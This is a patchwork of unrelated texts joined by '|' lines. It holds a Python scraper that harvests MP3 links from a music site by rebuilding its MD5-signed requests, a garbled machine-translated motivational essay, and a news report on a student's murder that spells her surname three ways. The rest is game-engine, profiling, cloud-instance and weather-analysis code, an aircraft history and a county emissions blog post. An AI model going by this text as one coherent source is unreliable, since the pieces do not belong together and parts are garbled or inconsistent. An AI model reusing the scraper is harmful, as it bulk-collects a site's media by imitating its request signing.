timeVal = timeVal.decode('utf-8')
m2 = hashlib.md5()
src = str(songIdInt) + "|" + str(t)
m2.update(src.encode("utf8"))
t = m2.hexdigest()
md5Val = getPostStr(pKey,str(t).encode('utf-8'))
md5Val = md5Val.decode('utf-8')
try:
print(songidVal)
print(timeVal)
print(md5Val)
ret = getSongRealUrl(songidVal,timeVal,md5Val)
except (ConnectionError , ConnectionResetError):
print("ConnectionError")
time.sleep(3)
continue
ret = ret.decode('utf-8')
#ret = '{"state":"success","message":"ok","action":null,"data":{"url":"http://us.aekun.com/upload/75AAB77BC2D16123F9F2E8B6C68FCB8E.mp3","song_name":"就算遇到挫折、受到嘲笑,也要勇敢的向前跑!","coll":0,"singername":"小哥","singerpic":"https://m4.aekun.com/user_l_5973822_20170513135220.png"}}'
print(ret)
ret = json.loads(ret)
print(ret)
status = ret['state']
if status != 'success':
print(status)
break
downUrl = ret['data']
if isinstance(downUrl,str):
if downUrl.strip() == '':
html = urlOpen("http://www.aekun.com/song/" + str(songIdInt)).decode('utf-8')
songIdInt = songIdInt + 1
continue
elif isinstance(downUrl,dict):
pass
else:
continue
downUrl = ret['data']['url']
if downUrl is None:
continue
if downUrl.strip() == "":
continue
post = downUrl[-3:]
post = post.lower()
if post != 'mp3' and post != 'm4a':
tmp = urlOpenGetHeaders(downUrl)
if tmp.find('mp3') != -1:
post = 'mp3'
songName = ret['data']['song_name']
writeStr = "%-10s|%-50s|%-5s|%s"%(songIdInt,songName,post,downUrl)
writeStrToFile(writeStr)
songIdInt = songIdInt + 1
now = datetime.datetime.now()
now = now.strftime('%Y-%m-%d %H:%M:%S')
writeStrToFile(str(now) + '\t\t\t' + str(maxSong))
if __name__ == '__main__':
downloadMusicMain()
|
Michelangelo is the Mexican Cornejo says: EL SER SER MEDIOCRE AND THE GREAT The mediocre love your bed like himself. The tired and mediocre lives is born to rest. The mediocre rest day so you can sleep at night. If you see someone lying mediocre, at once supports and assistance. The poor know that if the party is in conflict and the glasses to work, ready to leave the job.
For those who are mediocre work is sacred, so do not touch it. The mediocre evade duties and is always looking to make another's work. The mediocre mind that no one dies to rest. The mediocre always leave for tomorrow what you should do today. The poor are said to himself: "If work is health, working the sick." When the poor feel like work is looking for a quiet and wait patiently for those wishes will pass. Being excellent Instead greets the new day with a thousand projects to be undertaken. Being excellent knows that to enjoy the rest must finish the day without power drop. Being enjoys excellent night after a long day struggling to reach stars.
Being excellent challenges those around him to fight. Being excellent disclaims all that hinders their dreams. To be excellent work means the means to achieve everything you want. Being a good leader takes away jobs and always goes forward. Being excellent is aware that these are times that it will build and time in eternity to rest in peace. To be excellent the day is short, all you have done. To be excellent condition is the worst feeling helpless. Being excellent in their desires known is the scale of its achievements. Being good does all that the poor would not be able to run and is convinced that only through unconditional and generous delivery can improve the world, is the protagonist of change, is the social architect of his time, being good is of course a winner. Finally, estimated entrepreneur, there are many obstacles that must overcome if you want to specify your new venture, and "stepping outbreaks" are also an obstacle. But you will not disturb anything that may face the decision you are about to take. I can only tell you to watch the movie need to go to the movies, from the outside can not see. To win the game you must be part of the team from the stands will be just a spectator. Not what your project or venture but if you got you this opportunity has not been for anything, even by accident. Things come when it should be, ever. To say goodbye to you I leave one short paragraph of the book that I picked up the seven laws, and reads: Uncertainty, on the other hand, is the fertile ground of pure creativity and freedom. Uncertainty is thinking about the unknown in every moment of our existence. The unknown is the field of all possibilities, always fresh, always new, always open to creation of new manifestations. Without the uncertainty and without the unknown, life is only a repetition of memories spent vile. Come with faith and enthusiasm. Good luck.
|
import argparse, cProfile, importlib, itertools, pstats, sys
from os import path
import numpy as np
# Path hack
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
def profile(f, args):
"""Profile the sbf function f."""
z = 10**np.linspace(-3, 4, 1000)
n = np.arange(200)
zz, nn = np.meshgrid(z, n)
fnames = get_input_filenames(args)
cProfile.runctx("f(nn, zz)", globals(), locals(), fnames[0])
phases = np.exp(2*np.pi*np.random.rand(zz.shape[0], zz.shape[1]))
zz = zz*phases
fname = "{}_{}_complex.pstats".format(args.sbf, args.algo)
cProfile.runctx("f(nn, zz)", globals(), locals(), fnames[1])
def get_input_filenames(args):
return ("{}_{}_real.pstats".format(args.sbf, args.algo),
"{}_{}_complex.pstats".format(args.sbf, args.algo))
def get_output_filenames(args):
return ("{}_{}_real.txt".format(args.sbf, args.algo),
"{}_{}_complex.txt".format(args.sbf, args.algo))
def print_stats(args):
f_ins = get_input_filenames(args)
f_outs = get_output_filenames(args)
for f_in, f_out in itertools.izip(f_ins, f_outs):
with open(f_out, "w") as f:
p = pstats.Stats(f_in, stream=f)
p.strip_dirs().sort_stats("cumulative").print_stats(50)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("sbf",
help="The spherical Bessel function to profile.",
choices=["jn", "yn", "h1n", "h2n", "i1n", "i2n", "kn"])
parser.add_argument("algo",
help="The implementation to profile.",
choices=["default", "bessel", "a_recur", "cai",
"power_series", "d_recur_miller",
"candidate"])
args = parser.parse_args()
m = importlib.import_module("algos.{}".format(args.algo))
f = getattr(m, "sph_{}".format(args.sbf))
profile(f, args)
print_stats(args)
|
Security around La Trobe University's Bundoora campus has been increased and police are "saturating" the area after Israeli student Aiia Maasawre was brutally murdered on Wednesday morning, but the victim's family says police aren't doing enough.
The expression of grief comes as the person responsible remains on the run.
It's been three days since the 21-year-old's body was found a short walk from a tram stop and not far from the safety of the campus where she lived.
Ms Maasawre was attacked at about 12.10am, less than a kilometre from her home. Her body was dumped in shrubs near a shopping centre and discovered by workers early on Wednesday morning.
The few clues police have so far shared suggest Ms Maasawre was stalked from the No. 86 tram by a man who raped and murdered her. He then discarded clothes, including a black hat and a black and grey T-shirt.
As the hunt escalates, a vigil is being planned for Ms Maasawre tonight. Mourners will gather on the steps of Melbourne's Parliament House to remember the young woman whose life was taken too soon and to protest against another senseless, violent attack on a woman walking home.
Police are hunting for the man who murdered Israeli student Aiia Maasarwe.
Homicide detectives are releasing CCTV images of Ms Maasarwe from Tuesday night.
Before she was murdered, Ms Maasarwe had attended a comedy show in North Melbourne.
Detectives say it is likely Ms Masarwe had been travelling on the route 86 tram from Docklands.
A hat left near the victim’s body.
A grey and black T-shirt found at Bundoora.
|
"""
Slow Exit typeclass
Contribution - Griatch 2014
This is an example of an Exit-type that delays its traversal.This
simulates slow movement, common in many different types of games. The
contrib also contains two commands, CmdSetSpeed and CmdStop for changing
the movement speed and abort an ongoing traversal, respectively.
To try out an exit of this type, you could connect two existing rooms
using something like this:
@open north:contrib.slow_exit.SlowExit = <destination>
Installation:
To make all new exits of this type, add the following line to your
settings:
BASE_EXIT_TYPECLASS = "contrib.slow_exit.SlowExit"
To get the ability to change your speed and abort your movement,
simply import and add CmdSetSpeed and CmdStop from this module to your
default cmdset (see tutorials on how to do this if you are unsure).
Notes:
This implementation is efficient but not persistent; so incomplete
movement will be lost in a server reload. This is acceptable for most
game types - to simulate longer travel times (more than the couple of
seconds assumed here), a more persistent variant using Scripts or the
TickerHandler might be better.
"""
from evennia import DefaultExit, utils, Command
MOVE_DELAY = {"stroll": 6,
"walk": 4,
"run": 2,
"sprint": 1}
class SlowExit(DefaultExit):
"""
This overloads the way moving happens.
"""
def at_traverse(self, traversing_object, target_location):
"""
Implements the actual traversal, using utils.delay to delay the move_to.
"""
# if the traverser has an Attribute move_speed, use that,
# otherwise default to "walk" speed
move_speed = traversing_object.db.move_speed or "walk"
move_delay = MOVE_DELAY.get(move_speed, 4)
def move_callback():
"This callback will be called by utils.delay after move_delay seconds."
source_location = traversing_object.location
if traversing_object.move_to(target_location):
self.at_after_traverse(traversing_object, source_location)
else:
if self.db.err_traverse:
# if exit has a better error message, let's use it.
self.caller.msg(self.db.err_traverse)
else:
# No shorthand error message. Call hook.
self.at_failed_traverse(traversing_object)
traversing_object.msg("You start moving %s at a %s." % (self.key, move_speed))
# create a delayed movement
deferred = utils.delay(move_delay, callback=move_callback)
# we store the deferred on the character, this will allow us
# to abort the movement. We must use an ndb here since
# deferreds cannot be pickled.
traversing_object.ndb.currently_moving = deferred
#
# set speed - command
#
SPEED_DESCS = {"stroll": "strolling",
"walk": "walking",
"run": "running",
"sprint": "sprinting"}
class CmdSetSpeed(Command):
"""
set your movement speed
Usage:
setspeed stroll|walk|run|sprint
This will set your movement speed, determining how long time
it takes to traverse exits. If no speed is set, 'walk' speed
is assumed.
"""
key = "setspeed"
def func(self):
"""
Simply sets an Attribute used by the SlowExit above.
"""
speed = self.args.lower().strip()
if speed not in SPEED_DESCS:
self.caller.msg("Usage: setspeed stroll|walk|run|sprint")
elif self.caller.db.move_speed == speed:
self.caller.msg("You are already %s." % SPEED_DESCS[speed])
else:
self.caller.db.move_speed = speed
self.caller.msg("You are now %s." % SPEED_DESCS[speed])
#
# stop moving - command
#
class CmdStop(Command):
"""
stop moving
Usage:
stop
Stops the current movement, if any.
"""
key = "stop"
def func(self):
"""
This is a very simple command, using the
stored deferred from the exit traversal above.
"""
currently_moving = self.caller.ndb.currently_moving
if currently_moving:
currently_moving.cancel()
self.caller.msg("You stop moving.")
else:
self.caller.msg("You are not moving.")
|
Our research focuses on building tools to reduce the environmental impacts of energy systems, with an emphasis on greenhouse gas emissions (GHGs) from fossil energy systems. Our research methods include engineering-based life cycle assessment (LCA) modeling and computational optimization. Our research targets include transportation fuels (conventional oil and oil substitutes) and carbon dioxide capture and storage.
We study leakage from the natural gas system, with a focus on comprehensive assessment of leakage mechanisms, as well as ongoing work on detecting leakage from natural gas systems.
OPGEE is a bottom-up LCA tool that allows the user to estimate GHG emissions from oil and gas production operations under a variety of conditions and production technologies.
Optimization is used to choose technology configurations, designs, and operating conditions to achieve goals such as reduced cost and environmental impacts. Our group has applied optimization to carbon dioxide capture technologies and transportation fuels.
Life cycle assessment (LCA) is used to generate comprehensive measures of environmental impacts from producing a fuel, a product or a service. Our group builds LCA models of energy technologies.
The depletion of conventional energy resources has led to the development of fossil-based substitutes for oil such as oil shale, tar sands, and coal- and natural gas-based synthetic fuels. We examine the nature of resource depletion and the dynamics of these transitions.
Could the need for conventional oil decline more rapidly than expected, reducing concerns about geologic constraints to oil production? In this study, we examine the possibilities for oil depletion mitigation from demand reduction, efficiency improvements, and substitution of non-liquid and liquid fuels for conventional oil.
The FEAST model simulates the processes that cause natural gas system leaks to be created and fixed, allowing for assessment of different leak detection and repair technologies.
GHGfrack is an open-source engineering-based model to estimate greenhouse gas emissions from drilling and hydraulic fracturing operations.
|
#################
# codes for testing armor.patternMatching.pipeline and armor.patternMatching.algorithms
import time
import shutil
import os
time0 = time.time()
startTime =time.asctime()
from armor import defaultParameters as dp
from armor import misc
from armor import pattern, pattern2
from armor.patternMatching import pipeline as pp, algorithms
from armor.filter import filters
kongreyDSS = pattern2.kongreyDSS
hualien4 = misc.getFourCorners(dp.hualienCounty)
yilan4 = misc.getFourCorners(dp.yilanCounty)
kaohsiung4 = misc.getFourCorners(dp.kaohsiungCounty)
taipei4 = misc.getFourCorners(dp.taipeiCounty)
taitung4 = misc.getFourCorners(dp.taitungCounty)
regions = [{'name': "hualien", 'points': hualien4, 'weight': 0.25}, # equal weights: Yilan and Taipei are smaller but are visited by typhoons more
# {'name': "kaohsiung", 'points':kaohsiung4, 'weight':0.3}, #commented out: it's on the west coast and we want the window not to cross the central mountainous regions
{'name': "taipei", 'points':taipei4, 'weight':0.25},
{'name':"taitung", 'points':taitung4, 'weight':0.25},
{'name':"yilan", 'points':yilan4, 'weight':0.25}, # no need to add to 1
]
regionsString = "_".join([v['name']+str(round(v['weight'],2)) for v in regions])
outputFolder = dp.defaultRootFolder + "labReports/2014-03-07-filter-matching-scoring-pipeline/"+regionsString +'/'
### next up: work on the i/o so that i don't need to exit/re-enter ipython every time
# for loop added 18-03-2014
dss = kongreyDSS
obs = dss.obs
#obs.list = [v for v in obs if "00" in v.dataTime and v.dataTime>="20130828.0010"] # trim it down
obs.list = [v for v in obs if "00" in v.dataTime and (not ".00" in v.dataTime) and v.dataTime>="20130829.1800"] # trim it down
if not os.path.exists(outputFolder):
os.makedirs(outputFolder)
shutil.copyfile(dp.defaultRootFolder+"python/armor/start3.py", outputFolder+"start3.py")
for a in obs:
#obsTime="20130829.1800"
#kongreyDSS.load() # reload
dss.unload()
obsTime = a.dataTime
pp.pipeline(dss=kongreyDSS,
filteringAlgorithm = filters.gaussianFilter,
filteringAlgorithmArgs = {'sigma':5,
'stream_key': "wrfs" },
matchingAlgorithm = algorithms.nonstandardKernel,
matchingAlgorithmArgs = {'obsTime': obsTime, 'maxHourDiff':7,
'regions':regions,
'k' : 24, # steps of semi-lagrangian advections performed
'shiibaArgs':{'searchWindowWidth':11, 'searchWindowHeight':11, },
'outputFolder':outputFolder,
} ,
outputFolder=outputFolder,
toLoad=False,
#remarks= "Covariance used, rather than correlation: algorithms.py line 221: tempScore = a1.cov(w1)[0,1]",
remarks = "Correlation used"
)
print 'start time:', startTime
print 'total time spent:', time.time()-time0
|
The Bloch MB.220 began life for the French as a passenger-hauler before being requisitioned into military service for the French Air Force during World War 2.
Unless otherwise noted the presented statistics below pertain to the Bloch MB.220 model. Common measurements, and their respective conversions, are shown when possible.
ENGINE: 2 x Gnome-Rhone 14N-16/17 air-cooled radial piston engines developing 985 horsepower each.
• MB.220 - Base Series Designation; 1 prototype and 16 production models completed.
• MB.221 - Five post-World War 2 examples re-engined with Wright R-1820-97 Cyclone engines.
Detailing the development and operational history of the Bloch MB.220 Passenger Airliner / Military Transport Aircraft. Entry last updated on 1/14/2019. Authored by Staff Writer. Content ©www.MilitaryFactory.com.
Marcel Bloch founded Societe des Avions Marcel Bloch in 1928 (today better known as "Dassault)". The concern became a major aero-industry player for the nation of France throughout the 1930s and into the lead-up to World War 2 (1939-1945). One of its pre-war developments - to see service in the conflict - became the Bloch MB.220.
The MB.220 was conceived of as a passenger transport (airliner) of twin-engine design. The aircraft's appearance was consistent with the period: low monoplane wings being featured, a short nose ahead of the cockpit, and a single-finned tail unit. The aircraft was given a tail-dragger undercarriage arrangement to boot. For power, the company partnered with Gnome-Rhone and installed its 14N series air-cooled radial piston engines of 985 horsepower (each). These would be held in wing nacelles, one per wing unit. Beyond the flight crew of four (including two pilots), the aircraft held ferrying capacity for up to sixteen occupants.
Dimensionally, the MB. 220 featured a length of 63 feet and a wingspan of 74.10 feet. Its empty weight was 15,000lb with a Maximum Take-Off Weight (MTOW) of 20,945lb. Performance included a maximum speed of 205 miles per hour, a range out to 870 miles and a service ceiling of 23,000 feet.
A first-flight by way of prototype was had during December of 1935. Air France became the launch customer and sixteen production-quality models then followed with service introduction being had in 1938. With the arrival of war in 1939, the series was adopted by the French Air Force (as basic transports), though only the seventeen mentioned airframes were all that was ever completed, and use of this stock fell between Free French, Vichy French and German forces for their time in the air.
Before the end, a small collection of five was all that was left. In the post-war period, this lot was re-engined to take the American Wright R-1820-97 "Cyclone" engine instead and redesignated as the MB.221. Beyond that, the series fell to aviation history in the years following.
Graph showcases the Bloch MB.220's operational range (on internal fuel) when compared to distances between major cities.
|
import gevent
from qingcloud.iaas import connect_to_zone
from Brick.sockserver import SockClient
from base import ServiceBase
class QingService(ServiceBase):
port = 42424
def __init__(self, s_id, conf,
api_keypath, zone, image, keypair, vxnets):
super(QingService, self).__init__(s_id, conf)
with open(api_keypath) as f:
self.api_id = f.readline().split()[1].strip("'")
self.api_key = f.readline().split()[1].strip("'")
self.zone = zone
self.image = image
self.keypair = keypair
self.instance_id = None
self.vxnets = vxnets
self.host = None
def wait_booting(self, conn):
ret = conn.describe_instances(instances=self.instance_id)
if ret["instance_set"][0]["status"] != "running":
gevent.sleep(3)
return self.wait_booting(conn)
elif not ret["instance_set"][0]["vxnets"][0]["private_ip"]:
gevent.sleep(3)
return self.wait_booting(conn)
else:
return ret["instance_set"][0]
def conn_puppet(self):
self.puppet = SockClient((self.host, self.port), keep_alive=False)
self.puppet.hire_worker()
def real_start(self):
conn = connect_to_zone(self.zone, self.api_id, self.api_key)
ret = conn.run_instances(image_id=self.image,
instance_type=self.conf,
login_mode="keypair",
login_keypair=self.keypair,
vxnets=[self.vxnets])
self.instance_id = ret["instances"]
ret = self.wait_booting(conn)
self.host = ret["vxnets"][0]["private_ip"]
self.conn_puppet()
def real_terminate(self):
self.puppet.fire_worker()
self.puppet.shutdown()
conn = connect_to_zone(self.zone, self.api_id, self.api_key)
conn.terminate_instances(self.instance_id)
|
St. Louis County is a suburban county that rings the City of St. Louis on the north, west, and south, but does not include it. It includes more than 100 municipalities, some with tens of thousands of residents, others as small as a couple of blocks, and it also administers unincorporated area. St. Louis County published its Greenhouse Gas inventory in 2009, using 2008 as its baseline year.
Total community emissions for St. Louis County in 2008 were 23,520,171 MTCO2e. The report states that population was 994,098, yielding an estimate of 23.66 MTCO2e per capita. The first graph on the right shows community emissions by sector. Emissions caused by transportation were the largest source, accounting for 38% of total emissions. Almost all of it came from cars and trucks; only a tiny fraction, barely visible on the graph at right, came from the Metro Transit system. Commercial buildings emitted 27% of the total, while residential buildings emitted 26%. Most GHG inventories that I have seen do not construct an emission total for the built environment. It is, however, one of the largest sources of GHG emissions, and it is one of the sectors where energy efficiency, and hence GHG reduction, is least difficult. In this inventory, and in most of the others we have examined, the emissions from the commercial and residential sectors come from buildings, and the sectors can be summed to estimate emissions from the built environment. In St. Louis County, the commercial and residential sectors sum to 53% of total emissions.
Electricity was the largest source of GHG emissions in St. Louis County in 2008, accounting for 48% of total community emissions. It was followed by transportation fuels (gasoline & diesel), which together accounted for 38%. The inventory estimated that there were slightly more than 403,000 households in the county. Given that many of them use natural gas for heating, hot water, and/or cooking, it is remarkable that natural gas accounted for only 12% of emissions.
St. Louis County studied government emissions and energy costs in 2008, but did not report energy consumption. Not all departments reported their energy costs, so the estimates represent a lower limit, and actual costs were most likely somewhat higher. Looking at emissions by sector, buildings and facilities emitted by far the largest amount of GHG, more than four times as much as the next largest sector, vehicle fleet. However, as we have seen in some other inventories, the disparity in cost between buildings and fleet was not as great as the disparity in emissions. I believe that the reason for this pattern has to do with the energy sources used by the two sectors. Buildings tend to consume a lot of electricity, which is relatively inexpensive, but which tends to release a lot of GHG per unit of energy. Fleet, on the other hand, uses gasoline and diesel, which are more expensive, but less GHG intense.
In terms of sources, electricity accounted for 64% of St. Louis County’s GHG emissions. Together, transportation fuels (gasoline, diesel, and LPG) accounted for about 27% of emissions. However, almost all of the transportation emissions were from gasoline, with diesel and LPG accounting for very small fractions. The implication is that virtually all of St. Louis County’s vehicle emissions come from cars operated by county personnel, and very little comes from large trucks or off-road equipment. The graph at right show that police vehicles were the largest source of vehicle emissions. This matches findings from some other GHG inventories, for instance Creve Coeur, although the reports seldom present the data in a form that can be used to show this analysis.
I am no longer able to find the St. Louis County Greenhouse Gas Emissions Inventory Baseline on the St. Louis County website. A summary of some of the information is available at http://green.stlouisco.com/GreenhouseGasInventory. Those needing a copy are welcome to contact me by leaving a comment here on the blog.
By mogreenstats in Climate Change on 2013/02/04 .
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.